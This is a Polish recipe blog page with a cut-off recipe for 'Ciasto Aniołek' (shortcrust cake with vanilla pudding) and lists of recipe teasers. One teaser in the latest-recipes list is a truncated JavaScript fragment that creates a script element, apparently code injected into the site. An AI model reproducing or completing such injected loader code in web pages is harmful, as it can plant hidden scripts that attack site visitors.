Ciasto Aniołek

Wspaniałe połączenie kruchego ciasta i budyniu waniliowego. Ciasto najlepiej smakuje po 2-3 dniach, gdy placki nawilgną od masy. Wierzch można posypać wedle uznania płatkami migdałowymi, kokosem lub wiórkami białej czekolady. Polecam to ciasto nie tylko na co dzień ale również na wyjątkowe okazje.Ciasto:500g mąki pszennej200g śmietany 18%2 jajka125g masła1/2 szkl cukru1/2...
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 9
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 7
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 9
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 10
(function(){ u938=document.createElement("script");u938.type ⇖ 9
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 20
Przepisy z bloga
Delikatny, kruchy spód z czekoladowo-kokosowym kremem to... ⇖ 755
Pyszne i chrupiące gofry najbardziej smakują nam z cukrem... ⇖ 558
Mąż dostał od znajomego wiejski ser i poprosił o... ⇖ 6168
Te ciasteczka to wspomnienie mojego dzieciństwa. Kiedy... ⇖ 769
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 322
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 266